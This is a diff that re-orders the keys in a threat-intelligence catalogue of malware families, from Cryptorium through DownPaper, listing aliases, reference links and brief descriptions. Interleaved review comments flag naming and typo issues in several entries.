"https://twitter.com/struppigel/status/810770490491043840" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", - "value": "Cryptorium", - "description": "" + "value": "Cryptorium" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", - "value": "CryptoShield", - "description": "" + "value": "CryptoShield" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", - "value": "CryptoShuffler", - "description": "" + "value": "CryptoShuffler" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", - "value": "Cryptowall", - "description": "" + "value": "Cryptowall" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", - "value": "CryptoWire", - "description": "" + "value": "CryptoWire" }, { + "description": "", "meta": { - 
"synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", - "value": "CryptoFortress", - "description": "" + "value": "CryptoFortress" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", "https://twitter.com/JaromirHorejsi/status/818369717371027456" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", - "value": "CryptoRansomeware", - "description": "" + "value": "CryptoRansomeware" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", - "value": "CryptXXXX", - "description": "" + "value": "CryptXXXX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", - "value": "CsExt", - "description": "" + "value": "CsExt" }, { + "description": "", "meta": { - "synonyms": [ - "Windshield?" 
- ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal", "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451" - ] + ], + "synonyms": [ + "Windshield?" + ], + "type": [] }, "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", - "value": "Cuegoe", - "description": "" + "value": "Cuegoe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", - "value": "Cueisfry", - "description": "" + "value": "Cueisfry" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", - "value": "Cutlet", - "description": "" + "value": "Cutlet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", - "value": "Cutwail", - "description": "" + "value": "Cutwail" }, { + "description": "", "meta": { - "synonyms": [ - "Rebhip" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" - ] + ], + "synonyms": [ + "Rebhip" + ], + "type": [] }, "uuid": 
"062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", - "value": "CyberGate", - "description": "" + "value": "CyberGate" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", - "value": "CyberSplitter", - "description": "" + "value": "CyberSplitter" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", - "value": "CycBot", - "description": "" + "value": "CycBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", - "value": "Dairy", - "description": "" + "value": "Dairy" }, { + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", 
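Review bot: The Cuegoe entry on the new side keeps `"Windshield?"` as a synonym, so the question mark becomes part of the string consumers match on and the alias will never hit a feed that reports the name as `Windshield`. Uncertainty belongs in the prose, not in a matching key: keep `"synonyms": ["Windshield"]` only if the alias is confirmed, otherwise drop it and note the tentative link in `"description"` (currently `""` for this entry). In the same hunk the DanaBot description opens with `Proofpoints describes` (vendor is Proofpoint) and carries a trailing space before its closing quote; both are cheap to trim while the line is already being moved. None of this is introduced by the re-sort, but the re-sort is the natural moment to fix it, and the sort order now makes such field-level defects easier to spot in review.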
@@ -5280,288 +5282,286 @@ "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", - "value": "DanaBot", - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. 
" + "value": "DanaBot" }, { + "description": "", "meta": { - "synonyms": [ - "Fynloski", - "klovbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", "https://darkcomet.net", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" - ] + ], + "synonyms": [ + "Fynloski", + "klovbot" + ], + "type": [] }, "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", - "value": "DarkComet", - "description": "" + "value": "DarkComet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html", "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", - "value": "DarkMegi", - "description": "" + "value": "DarkMegi" }, { + "description": "", "meta": { - "synonyms": [ - "Chymine" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html", "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml" - ] + ], + "synonyms": [ + "Chymine" + ], + "type": [] }, "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", - "value": "Darkmoon", - "description": "" + "value": "Darkmoon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"1aecd6eb-80e2-4598-8504-d93f69c7a8f0", - "value": "DarkPulsar", - "description": "" + "value": "DarkPulsar" }, { + "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", - "value": "DarkShell", - "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry." + "value": "DarkShell" }, { + "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. 
The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", "https://blog.radware.com/security/2018/02/darksky-botnet/", "http://telegra.ph/Analiz-botneta-DarkSky-12-30", "https://github.com/ims0rry/DarkSky-botnet" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", - "value": "Darksky", - "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server." 
+ "value": "Darksky" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", - "value": "DarkStRat", - "description": "" + "value": "DarkStRat" }, { + "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", "https://securelist.com/dark-tequila-anejo/87528/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", - "value": "DarkTequila", - "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars." 
+ "value": "DarkTequila" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", - "value": "Darktrack RAT", - "description": "" + "value": "Darktrack RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Muirim", - "Nioupale" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" - ] + ], + "synonyms": [ + "Muirim", + "Nioupale" + ], + "type": [] }, "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", - "value": "Daserf", - "description": "" + "value": "Daserf" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", - "value": "Datper", - "description": "" + "value": "Datper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", 
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", - "value": "DDKONG", - "description": "" + "value": "DDKONG" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", - "value": "Decebal", - "description": "" + "value": "Decebal" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", - "value": "Delta(Alfa,Bravo, ...)", - "description": "" + "value": "Delta(Alfa,Bravo, ...)" }, { + "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", - "value": "Dented", - "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added." 
+ "value": "Dented" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", - "value": "DeputyDog", - "description": "" + "value": "DeputyDog" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", "https://twitter.com/struppigel/status/812601286088597505" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", - "value": "DeriaLock", - "description": "" + "value": "DeriaLock" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", - "value": "Derusbi", - "description": "" + "value": "Derusbi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", - "value": "Devil's Rat", - "description": "" + "value": "Devil's Rat" }, { + "description": "", "meta": { - "synonyms": [ - "LusyPOS" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", 
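Review bot: The DarkSky entry's `"value": "Darksky"` disagrees in case with its own description and the Malpedia/Radware references, which write `DarkSky`; since `value` is the primary name a galaxy consumer keys on, either change it to `"value": "DarkSky"` or add `"synonyms": ["DarkSky"]` so case-sensitive matching still resolves. Likewise `"value": "Delta(Alfa,Bravo, ...)"` packs several family names and an ellipsis into one value that no feed will ever emit verbatim; the individual names (whatever the cited ASERT post enumerates — I cannot confirm them from here) should go into `"synonyms"` with a single clean `value`. These are pre-existing data issues rather than regressions from the key re-ordering.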
@@ -5571,51 +5571,49 @@ "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" - ] + ], + "synonyms": [ + "LusyPOS" + ], + "type": [] }, "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", - "value": "Dexter", - "description": "" + "value": "Dexter" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.de_loader", "https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users", "https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2", - "value": "DE Loader", - "description": "" + "value": "DE Loader" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", + "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" + ], "synonyms": [ "Crysis", "Arena" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", - "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" - ] + "type": [] }, "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", - "value": "Dharma", - "description": "" + "value": "Dharma" }, { + "description": "", "meta": { - "synonyms": [ - "Crystal", - "Gorynych", - "Gorynch" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", "https://www.scmagazine.com/inside-diamondfox/article/578478/", 
@@ -5623,43 +5621,47 @@ "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", "https://blog.cylance.com/a-study-in-bots-diamondfox" - ] + ], + "synonyms": [ + "Crystal", + "Gorynych", + "Gorynch" + ], + "type": [] }, "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", - "value": "DiamondFox", - "description": "" + "value": "DiamondFox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", - "value": "Dimnie", - "description": "" + "value": "Dimnie" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", - "value": "DirCrypt", - "description": "" + "value": "DirCrypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", 
@@ -5668,173 +5670,173 @@ "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", - "value": "DistTrack", - "description": "" + "value": "DistTrack" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", - "value": "DMA Locker", - "description": "" + "value": "DMA Locker" }, { + "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html", "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", - "value": "DNSMessenger", - "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. 
This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker." + "value": "DNSMessenger" }, { + "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.", "meta": { - "synonyms": [ - "Shelma" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" - ] + ], + "synonyms": [ + "Shelma" + ], + "type": [] }, "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", - "value": "DogHousePower", - "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github." + "value": "DogHousePower" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", "https://research.checkpoint.com/dorkbot-an-investigation/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", - "value": "NgrBot", - "description": "" + "value": "NgrBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", - "value": "Dorshel", - "description": "" + "value": "Dorshel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", - "value": "DoublePulsar", - "description": "" + "value": "DoublePulsar" }, { + "description": "", "meta": { - "synonyms": [ - "DELPHACY" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" - ] + ], + "synonyms": [ + "DELPHACY" + ], + "type": [] }, "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", - "value": "Downdelph", - "description": "" + "value": "Downdelph" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", - "value": "Downeks", - "description": "" + "value": "Downeks" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", "http://www.clearskysec.com/charmingkitten/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", - "value": "DownPaper", - "description": "" + "value": "DownPaper" }, { + "description": "", "meta": { - "synonyms": [], - 
